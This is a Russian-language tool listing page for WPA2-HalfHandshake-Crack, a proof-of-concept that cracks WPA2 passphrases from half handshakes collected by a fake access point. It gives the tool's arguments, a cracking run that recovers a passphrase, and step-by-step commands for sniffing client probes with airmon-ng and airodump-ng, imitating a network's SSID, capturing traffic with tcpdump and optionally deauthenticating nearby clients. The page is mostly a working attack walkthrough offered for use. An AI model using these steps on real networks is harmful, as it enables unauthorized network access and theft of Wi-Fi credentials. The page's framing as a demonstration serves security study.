WPA2-HalfHandshake-Crack


Описание WPA2-HalfHandshake-Crack

Рабочий концепт для демонстрации возможности того, что для взлома WPA2 сети достаточно захватить рукопожатие (handshake) от пользователя, пытающегося подключиться к фальшивой ТД.

Обычные атаки на WPA2 заключаются в прослушивании рукопожатия между клиентом и Точкой Доступа. Полное четырёх этапное рукопожатие затем используется для атаки по словарю. Этот же инструмент является рабочим концептом демонстрирующим, что нет необходимости в присутствии Точки доступа. Злоумышленник может просто прослушивать WPA2 зонды (probes) от любых клиентов в диапазоне доступности, а затем поднимать Точку Доступа с услышанным SSID. Хотя аутентификация потерпит неудачу, будет собрано достаточно информации в неуспешном рукопожатии для запуска атаки по словарю в отношении этого рукопожатия.

Домашняя страница: https://github.com/dxa4481/WPA2-HalfHandshake-Crack

Автор: Dylan Ayrey

Лицензия: MIT

Справка по WPA2-HalfHandshake-Crack

Обязательные аргументы:

  • -m (MAC адрес ТД)
  • -s (SSID)
  • -r (имя файлаPCAP)

Необязательный аргумент:

  • -d (/путь/до/файла словаря)

Руководство по WPA2-HalfHandshake-Crack

Страница man отсутствует.

Примеры запуска WPA2-HalfHandshake-Crack

Прочитать файл с рукопожатием (-r sampleHalfHandshake.cap), полученного при попытке подключиться к точке доступа (-m AP mac), используемой во время захвата, с именем (-s AP SSID) и (опционально) прочитать словарь из файла (-d /путь/до/файла):


python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"
loading dictionary...
0.00788388022717% done. 250.469172638 hashes per second
0.0143003228938% done. 237.207726195 hashes per second
0.0212346846995% done. 238.343685782 hashes per second
0.0286869656441% done. 243.284719499 hashes per second
0.0353048213093% done. 240.624328943 hashes per second
0.0408005188399% done. 232.44365987 hashes per second
0.0468141355095% done. 229.104042665 hashes per second
0.0534895377457% done. 229.456259021 hashes per second
0.0597908872703% done. 228.302626008 hashes per second
0.0664375162209% done. 228.54339761 hashes per second
0.0731129184571% done. 228.830520246 hashes per second
0.0798170939787% done. 229.162336484 hashes per second
0.0865212695004% done. 229.442956452 hashes per second
Passphrase found! interwebs

Захват половинчатых рукопожатий (half handshakes)

Для прослушивания зондов от устройств можно использовать набор aircrack следующим образом:


sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

Вы должны увидеть зонды (probe) устройств с BSSID, появляющиеся внизу с надписью (not associated). Если видны WPA2 SSID для этих зондов, эти устройства могут быть целью.

Поднимите WPA2 wifi сеть с такой же SSID как и то, которое ищет в своих зондах устройство. Пароль может быть любым.

Захватывайте трафик на этом интерфейсе.

В Linux это можно достичь с помощью TCPdump:

sudo tcpdump -i wlan0 -s 65535 -w file.cap

(опционально) Деаутентифицируйте клиентов от близлежащих WiFi сетей для увеличения зондов.

Установка WPA2-HalfHandshake-Crack

Установка в Kali Linux

git clone https://github.com/dxa4481/WPA2-HalfHandshake-Crack.git
cd WPA2-HalfHandshake-Crack/
sudo python setup.py install

Установка в BlackArch

Программа предустановлена в BlackArch.

Информация об установке в другие операционные системы будет добавлена позже.

Скриншоты WPA2-HalfHandshake-Crack

Инструкции по WPA2-HalfHandshake-Crack


Близкие программы:

  • linset (100%)
  • mdk3 (100%)
  • WiFite (100%)
  • coWPAtty (100%)
  • Aircrack-ng (программа) (100%)
  • Mana (RANDOM - 66.7%)
  • Рекомендуется Вам:

    Comments are Closed